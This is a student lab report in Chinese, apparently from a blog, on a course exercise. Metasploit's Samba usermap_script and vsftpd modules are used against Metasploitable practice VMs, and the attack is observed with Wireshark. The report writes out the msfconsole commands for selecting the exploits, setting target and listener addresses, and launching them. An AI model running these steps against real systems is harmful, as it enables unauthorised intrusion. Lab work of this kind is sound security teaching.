20232801 2023-2024-2 《网络攻防实践》实践七报告

20232801 2023-2024-2 《网络攻防实践》实践七报告

1.实践内容

(1)使用Metasploit进行Linux远程渗透攻击
使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。
(2)实践作业:攻防对抗实践
两人都需要做攻击方,与防守方
攻击方:使用 Metasploit ,对靶机中发现的漏洞进行攻击,再实验中用到了两个samba;vsftp
防守方:使用wireshark监听获得网络攻击额度数据包文件。

2.实践过程

本次实验使用的攻击机为Kali,IP地址为192.168.86.223;靶机为Metasploit Ubuntu,IP地址为192.168.86.73:
首先在Kali上打开Metasploit。

msfconsole

在这里插入图片描述
查找要使用的漏洞对应的模块
search samba
在这里插入图片描述
使用第八个漏洞 有两个命令可以使用

use 8
use exploit/multi/samba/usermap_script

在这里插入图片描述
show payloads :查看可以所需要的参数
在这里插入图片描述
配置相应的参数
设置靶机:

set RHOST 192.168.86.73

设计攻击机:

set LHOST 192.168.86.223

设置完成后,输入exploit进行攻击
在这里插入图片描述
攻击成功在这里插入图片描述

2.攻防对抗实践 (在这里我们使用‘了两个漏洞)

1、使用的漏洞为:sermap_script

  • 攻击实验
    Kali-Linux攻击机(刘莹):192.168.86.223
    Metasploitable_ubuntu靶机(黄千里):192.168.86.208

第一步测试连通性:联通成功
在这里插入图片描述
扫描目标靶机的开放端口号与版本信息
在这里插入图片描述

与上述步骤一直,设置我的kali为攻击机,黄千里的为靶机
在这里插入图片描述
在这里插入图片描述

  • 防守实验
    Kali-Linux攻击机(千里):192.168.86.194
    Metasploitable_ubuntu靶机(刘莹):192.168.86.73
    打开wireshark进行抓包 看到其攻击
    在这里插入图片描述

2、使用的漏洞为:vsftp

重新下载了一个虚拟机:metasploitable2-linux

  • 攻击实验
    Kali-Linux攻击机 (刘莹)192.168.86.223
    metasploitable2-linux靶机(黄千里) 192.168.86.206

查看 vsftp ,use 0 进行使用
在这里插入图片描述
与上文一样设置网段,进行攻击,攻击成功
在这里插入图片描述

  • 防守实验:
    Kali-Linux攻击机(千里):192.168.86.194
    Metasploitable_ubuntu靶机(刘莹):192.168.86.237
    使用wireshark 抓取。iipaddr == 192.168.86.194 && ip.addr ==192.168.86.237 在这里插入图片描述

3.学习中遇到的问题及解决

问题1:双方使用同一局域网但是网段不在一起

  • 问题1解决方案:更换网络适配器的连接模式,ping 其他任意地址,再重启。
  • 问题2:Metasploitable_ubuntu 中能对samba进行攻击
  • 问题2解决方案:根据群里面的方法下载新的虚拟机Metasploitable_ubuntu 使用vsftp漏洞

4.实践总结

通过本次实验,我学会了如何进行远程渗透攻击,再次熟悉了Metasploit工具的使用,其次通过攻防对抗过程,学会了如何使用wireshark对攻击进行查看获取。

参考资料

Metasploitable_linux靶机下载地址

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值